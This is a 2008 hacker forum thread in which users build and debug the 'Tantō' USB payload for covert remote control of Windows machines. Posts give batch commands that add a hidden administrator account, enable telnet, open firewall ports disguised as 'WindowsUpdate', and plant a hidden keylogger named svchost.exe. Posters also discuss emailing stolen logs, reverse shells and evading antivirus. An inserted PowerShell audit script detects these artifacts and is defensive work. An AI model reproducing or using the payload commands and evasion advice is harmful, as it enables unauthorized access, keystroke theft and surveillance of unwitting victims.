DingleBerries Posted November 21, 2008

The Tantō Payload

Tantō: The tantō was designed primarily as a stabbing weapon, but the edge can be used for slashing as well. LINK

I want to keep this as light and fast as possible, no Nirsoft or Oxidt software. The goal of this payload is not to steal documents, infect the computer with an emailing keylogger, or install a VNC client, but to be able to use the machine remotely via a command line interface. Once we own the computer with this payload we should be able to sit and wait, like a Samurai, for the mark to leave (that is when the "exploitation" should begin).

COMPLETED:
KeyLogger
Remote Shell
Refresh Group Policies
Start telnet server on bootup
Add user "Tanto" to localgroup
Dump Users to %computername%_Users.txt
Hide Tanto with registry entry, without touching hard disk
Dump IP of all currently attached NICs to %computername%_IP.txt
Punch hole in Windows Firewall, opening ports 23 and 81, labeling them WindowsUpdate and System

TO DO:
Activate WOL
Windows Recovery Partition poisoning - As soon as I get some directory dumps from the community I can start on this
Assign drive letter "T" to thumbdrive
Program to send IP to email periodically
Use Russell Butturini's method of locating the USB drive and writing to it

Releases

Tantō Payload v. 1
Release: Friday November 28, 2008
NOTE THIS IS NOT A U3 PAYLOAD
Run "1.vbs"
Adds user Tanto
Opens telnet
Opens port 81 for back door
Auto start keylogger and backdoor

Tantō Payload RC v.0.1
Release: Friday November 21, 2008
I already have most of this planned out. I will release the source, if you don't decompile the .exe first, when Version 1 is out. Right now the .txt files are written to the same directory as the .exe; once it comes closer to time I will make the .ISO. I want to be sure I am doing it differently than the ones that have come before, so as not to set off any alarms.

Tantō Payload RC v.0.2
Release: Friday November 21, 2008
Same as RC v.0.1, also:
Copies keylogger to %windir% and sets hidden attribute
Adds registry entries for auto start
The payload.bat needs to have PAUSE commented out and changed back to END, etc., so that processes are closed
The antidote is working a little better, still needs work

Tantō Antidote RC v.0.1
Release: Friday November 21, 2008
Disable Telnet server
Reset Firewall to defaults
Removes traces of Tanto user account
Refreshes local and Active Directory based Group Policy settings

DOWNLOADS:
Tantō Payload RC v.0.1
Tantō Antidote RC v.0.1
Tantō Payload RC v.0.2
Tantō Payload v. 1
psydT0ne Posted November 21, 2008

Sounds sweet man, I'm looking forward to trying it out. Love the name... very cool.
DingleBerries (Author) Posted November 21, 2008

In the completed area, the tasks are not run in that order. I just liked having them go smallest to largest for aesthetic purposes. I think I will go to bed now and probably wake up around 12, do some school shit, and maybe go to the gym.. then I'll get back on this lol.. I am also contemplating a remote webcam viewer, but I'm not sure how ethical that would be. Remember, SUGGESTIONS ARE ENCOURAGED!
DMilton Posted November 21, 2008

If you want, we can code an aspirin for you, man! You did it fast and easy, good job, I feel the idea is very good! I'll be testing it during the next days. The name of the tool is cool. Sleep a bit for now!

:edit By the way, I don't know if the antidote is working, because it doesn't delete the HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList Tanto user. It doesn't generate the .txt files, only if I exec it from the system drive root. When I exec it, it leaves three exe files running in Task Manager: beta2.exe, cmd.exe and reg.exe. The antidote doesn't terminate those tasks at all and leaves another reg.exe instance running in the background. I think it can be caused by some problem with path names? If you want, PM me the source, I'll take a look at it.
DingleBerries (Author) Posted November 22, 2008

RC2 now has the bat scripts, it still really needs work, however the keylogger is inside. DOWNLOAD
Matessim Posted November 22, 2008

Hopefully this will develop. Is it U3? How is it configured? What output, HTML? Can you implant the feature which immediately sends an email with the logs? To secure a home run? :P
DMilton Posted November 22, 2008

Some issues and fixing them...

net user Tanto password /add && net localgroup administrators Tanto /add

In the adding of the Tanto administrator account, the payload will only create it if the group name of administrators is "administrators" (it's not my case). It will cause an error and will not work for systems whose Administrators group has been changed to another name or is installed in another language. A solution would be getting the correct administrators group name for a secure creation of the Tanto user. This way was the one I was developing in this post. The idea is getting the name of the Administrators group by asking for the S-1-5-32-544 SID and passing it to the payload in a variable.

::Hide Tanto's folder from prying eyes
attrib +r +a +s +h %SystemDrive%\docume~1\Tanto

Before you attrib anything, you must create the folder, and in the batch code it isn't. The correct code would be:

::Create and hide Tanto's folder from prying eyes
mkdir %SystemDrive%\docume~1\Tanto
attrib +r +a +s +h %SystemDrive%\docume~1\Tanto

::Change file attributes to Read-only, Hidden, Archive, and System attributes to the file
ATTRIB +H %windir%\svchost.exe

In the attribution of Read-only, Hidden, Archive and System to the keylogger you omitted the +r +a +s. The correct line would be:

::Change file attributes to Read-only, Hidden, Archive, and System attributes to the file
ATTRIB +r +a +s +h %windir%\svchost.exe

::Delete Keylogger
(
cd %windir%
del svchost.exe
)

In the deletion task of the svchost.exe file, this code will fail because the payload is running from the USB and not the %SystemDrive%. The correct code would be:

::Delete Keylogger
del %windir%\svchost.exe

SUGGESTIONS
I prefer to add the name of the account and the password by putting it in a variable at the beginning of the batch, or in an .ini file if it's exe-compiled and can't be edited, so we can add the user we want and not only the Tanto user.
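A defensive counterpart to the antidote, added here and not code from any post in this thread: an audit script that checks a Windows host for the artifacts described above (an account hidden under SpecialAccounts\UserList, the Telnet Server service, inbound allow rules on ports 23 and 81, and a svchost.exe dropped directly into %windir% rather than %windir%\System32), and enumerates the local Administrators group by the well-known SID S-1-5-32-544 as DMilton suggests, so the check is independent of the group's display name. It assumes an elevated PowerShell 5.1+ session on Windows 8 / Server 2012 or later (for Get-LocalGroupMember and the NetSecurity cmdlets); the `$expected` baseline is a constructed placeholder.

```powershell
# Added example, not code from the thread: audit a Windows host for the artifacts
# the payload and its antidote describe. Run elevated on Windows 8/2012 or later.
function Invoke-TantoAudit {
    $findings = @()

    # 1. Accounts hidden from the logon screen (a DWORD 0 under SpecialAccounts\UserList).
    $userList = 'HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList'
    if (Test-Path $userList) {
        foreach ($p in (Get-ItemProperty -Path $userList).PSObject.Properties) {
            if ($p.Name -notlike 'PS*' -and $p.Value -eq 0) {
                $findings += "account hidden from logon screen: $($p.Name)"
            }
        }
    }

    # 2. Local Administrators resolved by well-known SID, so it works whatever the
    #    group is called on a renamed or non-English install. $expected is a
    #    constructed baseline; replace it with the members your build should have.
    $expected = @("$env:COMPUTERNAME\Administrator")
    foreach ($m in Get-LocalGroupMember -SID 'S-1-5-32-544') {
        if ($expected -notcontains $m.Name) {
            $findings += "unexpected member of local Administrators: $($m.Name)"
        }
    }

    # 3. Telnet Server service (TlntSvr) running or set to start automatically.
    $svc = Get-Service -Name TlntSvr -ErrorAction SilentlyContinue
    if ($svc -and ($svc.Status -eq 'Running' -or $svc.StartType -eq 'Automatic')) {
        $findings += "Telnet Server is $($svc.Status), start type $($svc.StartType)"
    }

    # 4. Enabled inbound allow rules on the ports the payload opens (23 and 81),
    #    whatever display name they were given (the thread uses WindowsUpdate/System).
    $ports = @('23', '81')
    $rules = Get-NetFirewallPortFilter |
        Where-Object { @($_.LocalPort) | Where-Object { $ports -contains $_ } } |
        Get-NetFirewallRule
    foreach ($r in $rules) {
        if ("$($r.Enabled)" -eq 'True' -and "$($r.Direction)" -eq 'Inbound' -and "$($r.Action)" -eq 'Allow') {
            $findings += "inbound allow rule '$($r.DisplayName)' on port 23/81 (profile $($r.Profile))"
        }
    }

    # 5. svchost.exe directly under %windir% is never legitimate; the real binary
    #    lives in %windir%\System32. -Force also returns hidden/system files.
    $fake = Get-Item -Path "$env:windir\svchost.exe" -Force -ErrorAction SilentlyContinue
    if ($fake) { $findings += "suspicious file $($fake.FullName) (attributes: $($fake.Attributes))" }

    return $findings
}

Invoke-TantoAudit | ForEach-Object { Write-Output "[!] $_" }
```

An empty result means none of the listed artifacts were found; the same checks can be run from the antidote after cleanup to confirm it actually removed them.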
DingleBerries (Author) Posted November 22, 2008

"In the attribution of Read-only, Hidden, Archive and System to the keylogger you omitted the +r +a +s. The correct line would be:"

I had a problem with that part, when I changed that attrib to +sar the keylogger's log file won't show up either. I guess we can create that first and just give it a hidden attrib. Also looking at THIS for emailing logs if that is implemented along the way. On the subject of remote shells I was also looking into adding OpenSSH as well because it's less likely to get picked up by AV.
X3N Posted November 23, 2008

"I had a problem with that part, when I changed that attrib to +sar the keylogger's log file won't show up either. I guess we can create that first and just give it a hidden attrib. Also looking at THIS for emailing logs if that is implemented along the way. On the subject of remote shells I was also looking into adding OpenSSH as well because it's less likely to get picked up by AV."

I have some AutoIt code that will send mail which is even compatible with Gmail. I have some Python code I've been working on to send log files via Google Talk too... and I've been working on trying to make a custom reverse shell in Python using XML-RPC.
DingleBerries (Author) Posted November 23, 2008

"I have some AutoIt code that will send mail which is even compatible with Gmail. I have some Python code I've been working on to send log files via Google Talk too... and I've been working on trying to make a custom reverse shell in Python using XML-RPC."

I have to admit I know very little about Python, I can read it and modify some of it, but I am in no way fluent. However it is my assumption that you would have to have the framework installed in order to run the script. Also sending the log file is somewhat of a good idea but now it is adding more. I guess it's a good idea because the mark's IP would be in the header, removing the need to have another program call home. Also I was looking at scheduling a delete of the log file once it was sent, or should that be done by the attacker?
Tcstool Posted November 23, 2008

http://www.irongeek.com/i.php?page=videos/...with-metasploit

Check that stuff out, it might be helpful in this project.
DingleBerries (Author) Posted November 23, 2008

"http://www.irongeek.com/i.php?page=videos/...with-metasploit Check that stuff out, it might be helpful in this project."

That's the only problem I see with a payload. I can do most of what I want with Metasploit. I think opening ports in the firewall, enabling telnet and installing wget is more than enough, then all I have to do is get on an unsecured wireless network and host a fileserver to download the keylogger and edit reg settings from cmd. I have used the Hacksaw in the past and thought it would be nice to try and add something since I have taken something.
Jen Posted November 23, 2008

So how do you work this?
DingleBerries (Author) Posted November 23, 2008

"So how do you work this?"

It's beta, like the earliest of all betas, I just wanted some community input before anything was final so there is no "working this" atm. The keylogger will work on its own and the rest is all cmd shit.
Jen Posted November 24, 2008

I mean right now do we just run the cmd?
DingleBerries (Author) Posted November 24, 2008

"I mean right now do we just run the cmd?"

Yeah but it's not U3 ready, if you add it to the ISO all it will do is open firewall ports and turn on telnet. There is some heavy coding still needed. After this semester I should have a break to work on it. Also Ubuntu is starting to support autorun.inf so if the ufs partition starts getting recognized that may be good news.
X3N Posted November 24, 2008

"I have to admit I know very little about Python, I can read it and modify some of it, but I am in no way fluent. However it is my assumption that you would have to have the framework installed in order to run the script. Also sending the log file is somewhat of a good idea but now it is adding more. I guess it's a good idea because the mark's IP would be in the header, removing the need to have another program call home. Also I was looking at scheduling a delete of the log file once it was sent, or should that be done by the attacker?"

The Python script can be compiled into an exe after it's developed; also the AutoIt is compilable into an exe. Also depending on how you wrote the code the log could be stored as a variable or hidden temp file to be sent out after it completes in order to avoid needing to clean up afterwards...
DingleBerries (Author) Posted November 24, 2008

"The Python script can be compiled into an exe after it's developed; also the AutoIt is compilable into an exe. Also depending on how you wrote the code the log could be stored as a variable or hidden temp file to be sent out after it completes in order to avoid needing to clean up afterwards..."

I didn't know that about Python, I've seen sooo many tools that can steal creds and what not. Hmm, if that is true I may be switching to that. Thank you
X3N Posted November 24, 2008

"I didn't know that about Python, I've seen sooo many tools that can steal creds and what not. Hmm, if that is true I may be switching to that. Thank you"

Yeah there's a script called py2exe that does it.... I haven't successfully done it yet because I haven't gotten that far with the development... but that shouldn't be too far off.
Tcstool Posted November 24, 2008

"That's the only problem I see with a payload. I can do most of what I want with Metasploit. I think opening ports in the firewall, enabling telnet and installing wget is more than enough, then all I have to do is get on an unsecured wireless network and host a fileserver to download the keylogger and edit reg settings from cmd. I have used the Hacksaw in the past and thought it would be nice to try and add something since I have taken something."

I just think it would be awesome to have the reverse shell you're throwing back be Meterpreter! Plus being able to do the encoding to trick the AV isn't bad either.
pritchard9 Posted November 25, 2008

Sweet project DingleBerries! Nice name too :P I'll be keeping an eye on this, fo' sho'!

Pritchardo92
DingleBerries (Author) Posted November 28, 2008

Tanto Payload v. 1 HERE

Note this is not a U3 payload, that part still needs work. I think this works, but it still needs beta testers. I only tried it in a VM (only Windows machine I have). The .exe is linked to the VBS so do not change the name unless you change it in the VBS as well. The source is included as well as the back door and keylogger. There are dumped log files and what not. I will do a virus scan here in a minute.

System.exe is picked up as a virus by pretty much every virus protection, except: Avast, CAT-QuickHeal, eSafe, eTrust-Vet, Fortinet, PCTools, Prevx1, Sophos, Symantec, TheHacker, TrendMicro, ViRobot, VirusBuster. I will try to pack that later. The payload is flagged by eSafe and Panda. Ikarus says it's adware, and F-Secure says "Tibs.DBVL". The keylogger isn't picked up.
DingleBerries (Author) Posted November 30, 2008

Feedback anyone? Is it working?
alexthedrifter Posted November 30, 2008

How does the keylogger work?
PLuNK Posted November 30, 2008

Take a look at the source of it all. You're not going to learn much from the marketing words of Dingle.